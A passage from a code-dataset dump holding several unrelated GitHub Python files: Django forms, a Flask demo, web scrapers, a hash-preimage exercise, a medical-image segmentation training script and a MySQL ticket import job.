'__main__':\n\tmain()\n","repo_name":"salsalabs/engage_api_python3","sub_path":"activity/generic/activity_form_list.py","file_name":"activity_form_list.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35632604370","text":"from django import forms\n\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n title = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\": \"Your Title text\"}))\n description = forms.CharField(required=False, widget=forms.Textarea(attrs={\"class\": \"new-class-name two\", \"id\": \"my-id-for-textarea\", \"rows\": 20, \"cols\": 40}))\n # email = forms.EmailField()\n price = forms.DecimalField(initial=199.99)\n\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n # if not \"CFE\" in title:\n # raise forms.ValidationError(\"This is not a valid title\")\n return title\n\n # def clean_email(self, *args, **kwargs):\n # email = self.cleaned_data.get(\"email\")\n # if not email.endswith(\"edu\"):\n # raise forms.ValidationError(\"This is not a valid email\")\n # return email\n\n\nclass OldProductForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n\nclass RawProductForm(forms.Form):\n title = forms.CharField(widget=forms.TextInput(attrs={\n \"placeholder\": \"Your Title text\"\n }))\n description = forms.CharField(\n required=False,\n widget=forms.Textarea(\n attrs={\n \"class\": \"new-class-name two\",\n \"id\": \"my-id-for-textarea\",\n \"rows\": 20,\n \"cols\": 40\n }\n )\n )\n price = forms.DecimalField(initial=199.99)\n\n\n","repo_name":"kirankotari/tryDjango","sub_path":"src/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72226967468","text":"from flask import Flask, escape, request, session\n\napp = Flask(__name__)\napp.secret_key = \"asveniruby\" # 密钥,真实环境下为动态密钥\n\n\n@app.route('/')\ndef hello():\n name = request.args.get(\"name\", \"World\")\n return f'Hello, {escape(name)}!'\n\n\n# env FLASK_APP=flask_app flask run 运行接口\n# env FLASK_ENV=development FLASK_APP=flask_app flask run 开发模式运行接口\n\n# -----------------------#####-----------------------\n\n# 创建路由\n@app.route(\"/login\", methods=['get', 'post'])\ndef login():\n res = {\n \"method\": request.method,\n \"url\": request.path,\n \"args\": request.args, # 参数\n \"form\": request.form\n }\n session['username'] = request.args.get('name')\n return res\n","repo_name":"XuXuClassMate/My_Test_PyProject","sub_path":"terrace/Study_notes/rear_end/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73870280426","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\nfrom tqdm import tqdm\n\nstart = time.time()\n\n# Limiting parameter\nlimit_100 = True\n\n# URLs to scrape\nsites = [\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa/\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=2\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=3\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=4\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=5\"\n]\n\n# Actual program:\nlinks_list = []\n\n# Iterate over given sites\nfor site in sites:\n response = requests.get(site)\n soup = BeautifulSoup(response.content, \"html.parser\")\n \n # if cookies pop up, accept them\n cookies_button = soup.select_one(\"#onetrust-accept-btn-handler\")\n if cookies_button:\n requests.get(cookies_button[\"href\"])\n time.sleep(5)\n \n # find all objects with offers\n links = soup.select('main article[data-variant=\"regular\"] h2 a')\n for link in links:\n # get all links to offers\n links_list.append(link[\"href\"])\n \n # if limit_100 is enabled, stop after reaching 100 links\n if limit_100 and len(links_list) == 100:\n break\n \n # stop iterating if the limit is reached\n if limit_100 and len(links_list) == 100:\n break\n\n# Create output dataframe\ndf = pd.DataFrame(\n columns=['price', 'mileage', 'power', 'prod_year', 'seats_num', 'fuel', 'color', 'link']\n)\n\n# Iterate over offer links\nfor link in tqdm(links_list):\n response = requests.get(link)\n soup = BeautifulSoup(response.content, \"html.parser\")\n row = [None] * 8 # Initialize the row with None values\n \n # price\n price_element = soup.select_one(\"span.offer-price__number\")\n if price_element:\n txt = price_element.get_text(strip=True)\n row[0] = int(''.join([s for s in txt.split() if s.isdigit()]))\n else:\n for retry in range(3):\n time.sleep(5)\n response = requests.get(link)\n soup = BeautifulSoup(response.content, \"html.parser\")\n price_element = soup.select_one(\"span.offer-price__number\")\n if price_element:\n txt = price_element.get_text(strip=True)\n row[0] = int(''.join([s for s in txt.split() if s.isdigit()]))\n break\n\n\n # mileage\n mileage_element = soup.select_one(\"span:-soup-contains('Przebieg') + div\")\n if mileage_element:\n txt = mileage_element.get_text(strip=True)\n row[1] = int(''.join([s for s in txt.split() if s.isdigit()]))\n\n # power\n power_element = soup.select_one(\"span:-soup-contains('Moc') + div\")\n if power_element:\n txt = power_element.get_text(strip=True)\n row[2] = int(''.join([s for s in txt.split() if s.isdigit()]))\n\n # production year\n prod_year_element = soup.select_one(\"span:-soup-contains('Rok produkcji') + div\")\n if prod_year_element:\n row[3] = int(prod_year_element.get_text(strip=True))\n\n # number of seats\n seats_num_element = soup.select_one(\"span:-soup-contains('Liczba miejsc') + div\")\n if seats_num_element:\n row[4] = int(seats_num_element.get_text(strip=True))\n\n # fuel\n fuel_element = soup.select_one(\"span:-soup-contains('Rodzaj paliwa') + div a\")\n if fuel_element:\n row[5] = fuel_element.get_text(strip=True)\n\n # color\n color_element = soup.select_one(\"span:-soup-contains('Kolor') + div a\")\n if color_element:\n row[6] = color_element.get_text(strip=True)\n\n # link\n row[7] = link\n \n print(row)\n\n # add new row to df\n df.loc[len(df)] = row\n\n time.sleep(5)\n \n# save as csv\ndf.to_csv(\"offers.csv\", index=False, header=True)\n\nend = time.time()\n\n# save time measurement\nwith open('running_time.txt', 'w') as f:\n f.write('Running time of BeautifulSoup scraper:\\n')\n f.write(f\"{round(end - start, 2)} seconds\")\n","repo_name":"jtbandurski/WebScraping","sub_path":"soup/bs4-otomoto.py","file_name":"bs4-otomoto.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10781604366","text":"from csv import reader\nfrom .collisions import bt\n\n\ndef import_csv_layout(path):\n\tblocks_map = []\n\twith open(path) as map:\n\t\tlevel = reader(map,delimiter = ',')\n\t\t#for i in range(4): # i tried\n\t\t#\tblocks_map += [[0]*5]\n\t\tfor row in level:\n\t\t\ttemp = [int(i) for i in row]\n\t\t\tblocks_map.append(temp)\n\t\t#print(blocks_map,'\\n')\n\t\treturn list(zip(*blocks_map[::-1])) # blocks_map\n\n\nif __name__ == \"__main__\": # testing\n\tpath = \"./bloc_pics/map.csv\"\n\tfor i in import_csv_layout(path):\n\t print(i)","repo_name":"ano0002/E-mars","sub_path":"mining_game/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41077893303","text":"import hashlib, string, random\n\ndef hammingdistance(val1,val2): # calculates the number of indicies where values don't match\n output = sum(val1 != val2 for val1, val2 in zip(val1, val2)) # != is used as an xor operator \n return output\ndef generateString(n): # generates random string of length n \n all_characters = string.hexdigits\n newstring = ''\n for x in range(0,n): \n newstring = newstring + random.choice(all_characters)\n return newstring\ndef find_preimage(target, n): # generates random hash values until the first n characters match the target hash\n target = target.encode('hex')[:n*2]\n random_string = generateString(n*2)\n random_hash = hashlib.sha256(random_string).digest().encode('hex')[:n*2]\n while hammingdistance(target, random_hash) > 0 : \n random_string = generateString(n*2)\n random_hash = hashlib.sha256(random_string).digest().encode('hex')[:n*2]\n return random_string # returns the generated string that matches the first n hash values of the target\n \n","repo_name":"maccarlton25/cryptographic-hash-functions","sub_path":"a2_preimage.py","file_name":"a2_preimage.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39683515655","text":"# -*- coding: utf-8 -*-\n\"\"\"Neste script iremos em links da lista preprint_list.tsv, extraindo \nos tweets e os handles, no sentido de ter ao final uma dado tabular.\n\"\"\"\n\nfrom bs4 import BeautifulSoup as bsoup\nfrom selenium import webdriver\nimport csv\n\n\ndef createHeadlessFirefoxBrowser():\n\n # Criação do navegador\n\n options = webdriver.FirefoxOptions()\n options.add_argument(\"--headless\")\n return webdriver.Firefox(options=options)\n\n\ndef scrape_tweets(url):\n\n # Acessando página\n browser = createHeadlessFirefoxBrowser()\n browser.implicitly_wait(10)\n try:\n browser.get(url)\n except Exception:\n print(f\"Não consegui raspar dessa url: {url}\")\n browser.quit()\n else:\n # Raspando página\n paper_html = bsoup(browser.page_source, \"html.parser\")\n\n browser.quit()\n\n paper_title = paper_html.find(\"h1\", {\"id\": \"page-title\"}).get_text()\n html_handles = paper_html.find_all(\"div\", class_=\"handle\")\n html_posts = paper_html.find_all(\"p\", class_=\"summary\")\n\n # Extraindo apenas o texto\n posts = [i.get_text() for i in html_posts]\n handles = [i.get_text() for i in html_handles]\n\n # Criando lista final\n paper_table = []\n for j in range(len(handles)):\n dict_atual = {\n \"paper_link\": url,\n \"paper_title\": paper_title,\n \"handle\": handles[j],\n \"message\": posts[j],\n }\n paper_table.append(dict_atual)\n\n return paper_table\n\n\ndef main(max_preprints=500):\n \"\"\"max_preprints define o máximo de preprints da lista\n preprint_list que serão raspados. Altere caso deseje raspar mais ou menos.\"\"\"\n\n with open(\"preprint_list.tsv\", \"r\") as f:\n preprints = f.read().splitlines()\n\n # Raspando a página de cada preprint\n resultado_final = []\n for preprint in preprints[0:max_preprints]:\n try:\n atual = scrape_tweets(preprint)\n resultado_final.extend(atual)\n except Exception:\n pass\n\n # Escrevendo o dado final\n keys = resultado_final[0].keys()\n with open(\"data/preprint_tweets.csv\", \"w\", newline=\"\") as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(resultado_final)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jvfe/nobudgetsci-tweets","sub_path":"scrape_tweets.py","file_name":"scrape_tweets.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37560855550","text":"class Mahasiswa(object):\r\n def __init__(self, nama, nim, kota, uangsaku):\r\n self.nama = nama\r\n self.nim = nim\r\n self.tempatTinggal = kota\r\n self.uangSaku = uangsaku\r\n\r\nm0 = Mahasiswa(\"Jono\", 123, \"Sragen\", 240000)\r\nm1 = Mahasiswa(\"Andi\", 154, \"Yogyakarta\", 230000)\r\nm2 = Mahasiswa(\"Jordi\", 108, \"Surakarta\", 230000)\r\nm3 = Mahasiswa(\"Lala\", 140, \"Surakarta\", 235000)\r\nm4 = Mahasiswa(\"Putri\", 113, \"Boyolali\", 240000)\r\nm5 = Mahasiswa(\"Raihan\", 132, \"Semarang\", 250000)\r\nm6 = Mahasiswa(\"Janis\", 186, \"Klaten\", 245000)\r\nm7 = Mahasiswa(\"Nanda\", 199, \"Wonogiri\", 245000)\r\nm8 = Mahasiswa(\"Putantri\", 187, \"Klaten\", 245000)\r\nm9 = Mahasiswa(\"Hardi\", 153, \"Karanganyar\", 270000)\r\nm10 = Mahasiswa(\"Maya\", 148, \"Purwodadi\", 265000)\r\n\r\nDaftar = [m0, m1, m2, m3, m4, m5, m6, m7, m8, m9, m10]\r\n\r\ndef cariLinkedList(head, target):\r\n temp = head\r\n while temp.data != None:\r\n if temp.data == target:\r\n return temp\r\n return -1\r\n","repo_name":"L200184098/Prak_Algostruk","sub_path":"L200184098_Modul4_H/No5.py","file_name":"No5.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34181596790","text":"import torch\nfrom torch.autograd import Variable\nimport argparse\nfrom datetime import datetime\nfrom lib.TransFuse import TransFuse_S\n# from utils.dataloader import get_loader, test_dataset\nfrom utils.utils import AvgMeter\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom test_isic import mean_dice_np, mean_iou_np\nimport os\nfrom datasets.dataset_synapse import Synapse_dataset, RandomGenerator\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom utils.utils import DiceLoss\nfrom torch.nn.modules.loss import CrossEntropyLoss\n\n# def structure_loss(pred, mask):\n# mask = mask.type('torch.cuda.FloatTensor')\n# mask = mask.reshape(mask.shape[0], -1, mask.shape[1], mask.shape[2])\n# weit = 1 + 5*torch.abs(F.avg_pool2d(mask, kernel_size=31, stride=1, padding=15) - mask)\n# wbce = F.binary_cross_entropy_with_logits(pred, mask, reduction='none')\n# wbce = (weit*wbce).sum(dim=(2, 3)) / weit.sum(dim=(2, 3))\n\n# pred = torch.sigmoid(pred)\n# inter = ((pred * mask)*weit).sum(dim=(2, 3))\n# union = ((pred + mask)*weit).sum(dim=(2, 3))\n# wiou = 1 - (inter + 1)/(union - inter+1)\n# return (wbce + wiou).mean()\n\n\ndef train(train_loader, model, optimizer, epoch, best_loss, opt, iter_num):\n model.train()\n ce_loss = CrossEntropyLoss()\n dice_loss = DiceLoss(opt.num_class)\n for i_batch, sampled_batch in enumerate(train_loader):\n image_batch, label_batch = sampled_batch['image'], sampled_batch['label']\n image_batch, label_batch = image_batch.cuda(), label_batch.cuda()\n outputs = model(image_batch)\n loss_ce_4 = ce_loss(outputs[0], label_batch[:].long())\n loss_ce_3 = ce_loss(outputs[1], label_batch[:].long())\n loss_ce_2 = ce_loss(outputs[2], label_batch[:].long())\n loss_ce = 0.5 * loss_ce_2 + 0.3 * loss_ce_3 + 0.2 * loss_ce_4\n loss_dice_4 = dice_loss(outputs[0], label_batch, softmax=True)\n loss_dice_3 = dice_loss(outputs[1], label_batch, softmax=True)\n loss_dice_2 = dice_loss(outputs[2], label_batch, softmax=True)\n loss_dice = 0.5 * loss_dice_2 + 0.3 * loss_dice_3 + 0.2 * loss_dice_4\n loss = 0.4 * loss_ce + 0.6 * loss_dice\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), opt.grad_norm)\n optimizer.step()\n\n iter_num = iter_num + 1\n print('iteration %d : loss : %f, loss_ce: %f' % (iter_num, loss.item(), loss_ce.item()))\n\n\n\n# def test(model, path):\n\n# model.eval()\n# mean_loss = []\n\n# for s in ['val', 'test']:\n# image_root = '{}/data_{}.npy'.format(path, s)\n# gt_root = '{}/mask_{}.npy'.format(path, s)\n# test_loader = test_dataset(image_root, gt_root)\n\n# dice_bank = []\n# iou_bank = []\n# loss_bank = []\n# acc_bank = []\n\n# for i in range(test_loader.size):\n# image, gt = test_loader.load_data()\n# image = image.cuda()\n\n# with torch.no_grad():\n# _, _, res = model(image)\n# loss = structure_loss(res, torch.tensor(gt).unsqueeze(0).unsqueeze(0).cuda())\n\n# res = res.sigmoid().data.cpu().numpy().squeeze()\n# gt = 1*(gt>0.5) \n# res = 1*(res > 0.5)\n\n# dice = mean_dice_np(gt, res)\n# iou = mean_iou_np(gt, res)\n# acc = np.sum(res == gt) / (res.shape[0]*res.shape[1])\n\n# loss_bank.append(loss.item())\n# dice_bank.append(dice)\n# iou_bank.append(iou)\n# acc_bank.append(acc)\n \n# print('{} Loss: {:.4f}, Dice: {:.4f}, IoU: {:.4f}, Acc: {:.4f}'.\n# format(s, np.mean(loss_bank), np.mean(dice_bank), np.mean(iou_bank), np.mean(acc_bank)))\n\n# mean_loss.append(np.mean(loss_bank))\n\n# return mean_loss[0] \n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--epoch', type=int, default=150, help='epoch number')\n parser.add_argument('--lr', type=float, default=0.001, help='learning rate')\n parser.add_argument('--batchsize', type=int, default=8, help='training batch size')\n parser.add_argument('--grad_norm', type=float, default=2.0, help='gradient clipping norm')\n parser.add_argument('--train_path', type=str,\n default='data/', help='path to train dataset')\n parser.add_argument('--test_path', type=str,\n default='data/', help='path to test dataset')\n parser.add_argument('--train_save', type=str, default='TransFuse_S')\n parser.add_argument('--beta1', type=float, default=0.5, help='beta1 of adam optimizer')\n parser.add_argument('--beta2', type=float, default=0.999, help='beta2 of adam optimizer')\n parser.add_argument('--data_path', type=str, default= '../Synapse/train_npz/', help='dataset path')\n parser.add_argument('--list_dir', type=str, default= '../Synapse/lists/lists_Synapse', help='list_dir')\n parser.add_argument('--num_class', type=int, default=14, help='number of segmentation classes')\n parser.add_argument('-o', '--log-path', type=str, default= 'log/', help='log path')\n opt = parser.parse_args() \n\n # ---- build models ----\n model = TransFuse_S(pretrained=True, num_classes=opt.num_class).cuda()\n params = model.parameters()\n optimizer = torch.optim.Adam(params, opt.lr, betas=(opt.beta1, opt.beta2))\n \n # image_root = '{}/data_train.npy'.format(opt.train_path)\n # gt_root = '{}/mask_train.npy'.format(opt.train_path)\n\n # train_loader = get_loader(image_root, gt_root, batchsize=opt.batchsize)\n db_train = Synapse_dataset(base_dir=opt.data_path, list_dir=opt.list_dir, split=\"train\",\n transform=transforms.Compose(\n [RandomGenerator(output_size=[192, 256])]))\n def worker_init_fn(worker_id):\n random.seed(args.seed + worker_id)\n train_loader = DataLoader(db_train, batch_size=opt.batchsize, shuffle=True, num_workers=0, pin_memory=True,\n worker_init_fn=worker_init_fn)\n total_step = len(train_loader)\n\n print(\"#\"*20, \"Start Training\", \"#\"*20)\n\n best_loss = 1e5\n for epoch in range(1, opt.epoch + 1):\n best_loss = train(train_loader, model, optimizer, epoch, best_loss, opt, epoch)\n save_interval = 10\n if epoch == 1:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n\n if (epoch + 1) % save_interval == 0:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n\n if epoch >= opt.epoch - 1:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n break","repo_name":"marcochen11/EECS545_Final_Proj","sub_path":"train_isic.py","file_name":"train_isic.py","file_ext":"py","file_size_in_byte":7071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9830549393","text":"import sys\nimport os\nimport json\nimport urllib.request\nfrom pprint import pprint\nimport datetime\nfrom datetime import timedelta\nimport mysql.connector\nimport csv\nimport codecs\n\nimport MyLogger\nimport MyLib\n\n#Déclaration\narguments = dict() #dict\ni = 0 #Int\nconfig_json = {} #Json\nstatusSupervision = \"OK\"\n\n#Procedure chargement du fichier config JSON\ndef charger_config() :\n global config_json\n try:\n MyLogger.logger.debug(\"Début chargement configuration\")\n config=codecs.open(arguments[\"param\"], 'r','utf-8')\n config_json = json.load(config)\n MyLogger.logger.debug(\"Chargement configuration réussi\")\n except ValueError as exc:\n MyLogger.logger.error(\"Erreur pendant le chargement du fichier de configuration : \" + arguments[\"param\"])\n sys.exit(\"Erreur\")\n\n#importe un obj\ndef import_url(p_url, p_file_out, p_table) :\n try:\n #En prod oui\n #proxies = {'http': 'http://fr-proxy.groupinfra.com:3128'}\n #opener = urllib.request.FancyURLopener(proxies)\n opener = urllib.request.FancyURLopener({})\n response = opener.open(p_url)\n page = response.read().decode('utf-8')\n\n fo = open(config_json[\"parameters\"][\"path\"]+p_file_out, \"wb\")\n fo.write(page.encode('utf-8'))\n fo.close()\n\n MyLogger.logger.debug(\"Création du fichier : \"+p_file_out+\", réussi\")\n\n cnx = mysql.connector.connect(user=config_json[\"config_db_integration\"][\"db\"], database=config_json[\"config_db_integration\"][\"db\"], password=config_json[\"config_db_integration\"][\"mdp\"], host=config_json[\"config_db_integration\"][\"host\"])\n cur = cnx.cursor(buffered=True)\n\n with open(config_json[\"parameters\"][\"path\"]+p_file_out, encoding='utf-8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n headers = reader.__next__()\n\n sql = \"DROP TABLE `rec_\"+p_table+\"`\"\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n sql = \"CREATE TABLE `rec_\"+p_table+\"` (`id` int(11) NOT NULL AUTO_INCREMENT,\"\n\n for header in headers:\n sql += \"`\"+header.replace(\"'\", \"\\\\'\")+\"` varchar(255),\"\n \n sql += \"`dateTime_record` datetime, PRIMARY KEY (`id`));\"\n\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n\n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n nb_ligne_succes = 0\n nb_ligne_warning = 0\n nb_ligne_erreur = 0\n \n for rows in reader:\n sql = \"INSERT INTO `rec_\"+p_table+\"` (\"\n for header in headers:\n sql += \"`\"+header.replace(\"'\", \"\\\\'\")+\"`,\"\n sql += \"`id`, `dateTime_record`) VALUES (\"\n for row in rows:\n sql += \"'\"+row.replace(\"'\", \"\\\\'\")+\"',\"\n sql += \"NULL,NOW());\"\n\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n nb_ligne_erreur += 1\n\n retour = cur.fetchone()\n if(retour is not None):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n nb_ligne_warning += 1\n else :\n nb_ligne_succes += 1\n\n cnx.commit()\n\n cnx.close()\n \n MyLogger.logger.debug(\"Importation réussi (\"+str(nb_ligne_succes)+\" lignes succées, \"+str(nb_ligne_warning)+\" lignes warning, \"+str(nb_ligne_erreur)+\", lignes erreur)\")\n\n os.rename(config_json[\"parameters\"][\"path\"]+p_file_out, config_json[\"parameters\"][\"path\"]+\"Archives/\"+p_file_out)\n \n #supervision\n if nb_ligne_succes == 0 :\n statusSupervision = \"WARNING\"\n \n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:Importation][fichier:\"+p_file_out+\"][nb_ligne_succes:\"+str(nb_ligne_succes)+\"][nb_ligne_warning:\"+str(nb_ligne_warning)+\"][nb_ligne_erreur:\"+str(nb_ligne_erreur)+\"]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n \n except Exception as e:\n MyLogger.logger.error(\"Erreur pendant import_url : (\"+format(e)+\")\")\n sys.exit(\"Erreur\")\n\n#Procedure Mise à jour\ndef importer() :\n global config_json\n try:\n MyLogger.logger.debug(\"Début importation\")\n\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:start]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n\n now = datetime.datetime.now()\n dateTime = now.strftime(\"%y%m%d_%H%M\")\n datTimSemDerniere = datetime.datetime.now()-timedelta(days=7)\n strSemDerniere = datTimSemDerniere.strftime(\"%Y-%m-%d\")\n\n for objs in config_json[\"config_brise\"]:\n url = config_json[\"config_brise\"][objs]\n name_file_out = \"data_\"+objs+\"_\"+dateTime+\".csv\"\n MyLogger.logger.debug(\"Objet à importer : \"+objs)\n MyLogger.logger.debug(\"Url de l'objet : \"+url)\n MyLogger.logger.debug(\"Fichier de sortie : \"+name_file_out)\n\n import_url(url, name_file_out, objs)\n\n cnx = mysql.connector.connect(user=config_json[\"config_db_integration\"][\"db\"], database=config_json[\"config_db_integration\"][\"db\"], password=config_json[\"config_db_integration\"][\"mdp\"], host=config_json[\"config_db_integration\"][\"host\"])\n cur = cnx.cursor(buffered=True)\n\n MyLogger.logger.debug(\"Chargement des données\")\n \n sql = \"SELECT charger_data_oceane('');\"\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n MyLogger.logger.debug(\"Chargement des données réussi\")\n\n #Merge des tickets debut\n MyLogger.logger.debug(\"Merge des tickets\")\n \n sql = \"select merge_tickets('');\"\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n cnx.commit() \n\n MyLogger.logger.debug(\"Merge des tickets réussi\")\n #Merge des tickets fin\n\n #synchro oceane debut\n MyLogger.logger.debug(\"Synchronisation Oceane\")\n \n sql = \"select synchro_oceane('\"+strSemDerniere+\"');\"\n MyLogger.logger.debug(\"Lancement du SQL : \"+ sql)\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n sql = \"select synchro_oceane_sta_vr('\"+strSemDerniere+\"');\"\n MyLogger.logger.debug(\"Lancement du SQL : \"+ sql)\n try:\n cur.execute(sql)\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql)\n \n retour = cur.fetchone()\n if(retour[0] is not 1):\n MyLogger.logger.warning(\"Retour : \"+retour+\", SQL : \"+sql)\n\n cnx.commit() \n\n MyLogger.logger.debug(\"Synchronisation Oceane réussi\")\n #synchro oceane fin\n \n cnx.close()\n\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:fin][Statut:\"+statusSupervision+\"]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n \n except Exception as e:\n MyLogger.logger.error(\"Erreur pendant importer : (\"+format(e)+\")\")\n #supervision\n cnx_ring = mysql.connector.connect(user=config_json[\"config_db_supervision\"][\"db\"], database=config_json[\"config_db_supervision\"][\"db\"], password=config_json[\"config_db_supervision\"][\"mdp\"], host=config_json[\"config_db_supervision\"][\"host\"])\n cur_ring = cnx_ring.cursor(buffered=True)\n sql = \"INSERT INTO `tab_log` (`id` ,`dateTime` ,`type` ,`commentaires`) VALUES (NULL , NOW(), \"+config_json[\"parameters\"][\"type_log\"]+\", '[INFO][Etape:fin][Statut:KO]Synchro Brise-NOA');\"\n try:\n cur_ring.execute(sql)\n cnx_ring.commit()\n except mysql.connector.Error as err:\n MyLogger.logger.error(\"Erreur : \"+format(err))\n MyLogger.logger.debug(\"SQL : \"+sql) \n cnx_ring.close()\n sys.exit(\"Erreur\")\n\n#Procedure Say More\ndef more() :\n MyLogger.logger.info(\"Les options disponible sont : 'importer'.\")\n MyLogger.logger.info(\"Exemple de syntax pour 'decode' : 'python script_import_oceane.py exemple.config.api.oda_noa.json importer'.\")\n MyLogger.logger.info(\"Exemple de syntax pour 'more' : 'python script_import_oceane.py more'.\")\n \n\n#Message de bienvenu.\nMyLogger.logger.info (\"Bienvenue dans le script d'importation des tickets Océnane.\")\n\n#Récupération des arguments.\nfor x in sys.argv :\n i += 1\n if i == 2 :\n arguments[\"param\"] = x\n elif i == 3 :\n 